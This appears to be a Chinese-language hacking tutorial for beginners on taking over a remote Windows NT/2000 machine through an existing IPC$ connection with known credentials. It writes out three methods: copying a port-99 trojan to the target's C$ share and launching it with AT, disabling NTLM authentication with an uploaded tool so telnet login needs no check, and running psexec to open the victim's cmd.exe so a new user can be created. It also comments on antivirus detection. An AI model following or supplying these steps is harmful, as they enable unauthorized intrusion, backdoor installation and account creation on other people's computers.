利用用户建立了IPC连接,成功的话并不能直接在你的电脑上建立超级用户,因为NET USER /ADD必须是在本地运行的,也就是说,你必须想办法TELNET,或者用其他方法跳进对方的CMD里才能建立用户.如何能利用用户打开对方的CMD呢?
前提:你已经拥有了用户和密码.
方法一:因为前面已经成功建立了IPC连接,所以我们就可以复制命令把木马传送过去,例如上传SRV.EXE,
COPY SRV.EXE \\IP\C$
然后用NET TIME \\IP查看对方的时间,再用类似AT \\IP SRV.EXE 06:10的命令来运行SRV.EXE,不要告诉我SRV是开99端口的木马都不知道?!如果顺利SRV没被杀毒软件KILL了的话,就可以在运行或着CMD里输入TELNET IP 99来登陆对方CMD了.然后就可以在对方CMD里建立用户了,跟本地DOS操作一样``
方法二:利用NETSVC.EXE这个工具来打开对方的TELNET服务,但是即使打开了TELNET,也要通过对方NTLM验证,还要把对方NTLM验证关掉,常用的方法就是,上传流光里的NTLM.EXE,再用AT运行,就可以直接TELNET IP而不用验证了.再者,也可以在本地建立一个与你用来进行IPC连接的密码和用户名相同的用户,然后再重新启动用这个用户本地登陆,就可以直接TELNET了
方法三:这方法是最简单最容易而最有效的方法,如果你有耐性看到这里,就说明我的努力没有白费了.之所以不把这种方法写在前面,是因为想菜鸟们能够多尝试其他的方法,明白"通往电脑的路不止一条!"的道理.
先在网上下载一套叫PSTOOLS的工具包,PSTOOLS是一套用于winnt\win2000的系统管理工具,打开压包后里面共有十二个命令,功能非常强大.这里我们要用到的就是PSEXEC.EXE,具体功能就不说了,自己去看说明吧,使用格式如下
psexec.exe \\ip -u 用户名 -p 密码 cmd.exe
这样就能直接打开对方CMD了,而且不用NTLM验证.
下面是PSTOOLS的下载地址
因为SRV.EXE和NTLM.EXE被很多杀毒软件认定为病毒了,多半会被杀掉.所以成功率不高.对比下第三种方法是最实在的,相信也是看完本文后大家用的最多的方法,希望你能接受吧.也建议大家试试前面的两种方法,如果你有去尝试,你一定会有收获的.
|
